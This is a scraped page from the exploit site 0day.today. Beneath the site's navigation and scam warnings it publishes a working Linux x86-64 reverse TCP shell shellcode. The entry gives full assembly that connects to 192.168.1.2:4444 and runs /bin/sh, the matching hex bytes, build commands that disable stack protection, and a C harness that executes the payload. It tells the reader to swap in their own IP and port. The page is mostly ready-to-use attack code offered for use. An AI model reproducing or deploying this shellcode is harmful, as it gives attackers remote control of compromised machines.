0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
[/*
;Title: Linux/x86_64 - Reverse Shell Shellcode (192.168.1.2:4444)
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: Reverse Shell, Run nc and listen port 4444.
;Shellcode Length: 153
;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
===COMPILATION AND EXECUTION Assemmbly file===
#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
#ld shell.o -o shell <=== Making Binary File
#./bin2shell.sh shell <== xtract hex code from the binary(
https://github.com/touhidshaikh/bin2shell)
=================SHELLCODE(INTEL FORMAT)=================
global _start
_start:
xor rax,rax
add rax, 41
xor rdi,rdi
mov rdx, rdi
add rdi, 2
xor rsi,rsi
add rsi, 1
syscall
mov rdi, rax
xor rax, rax
push rax
add rax,0x2
mov dword [rsp-4], 0x0201a8c0 : IP : 192.168.1.2, Change what u
want(Little Endian)
mov word [rsp-6], 0x5c11 ; PORT : 4444, Change what u
want(Little Endian)
mov word [rsp-8], ax
sub rsp, 8
add rax, 40
mov rsi, rsp
xor rdx,rdx
add rdx, 16
syscall
xor rax,rax
mov rsi, rax
add rax, 33
syscall
xor rax,rax
add rax, 33
xor rsi,rsi
add rsi, 1
syscall
xor rax, rax
add rax, 33
xor rsi,rsi
add rsi, 2
syscall
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
===================END HERE============================
====================FOR C Compile===========================
Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x89\xfa\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x83\xc0\x02\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x11\x5c\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x83\xc0\x28\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x89\xc6\x48\x83\xc0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# 0day.today [2024-12-23] #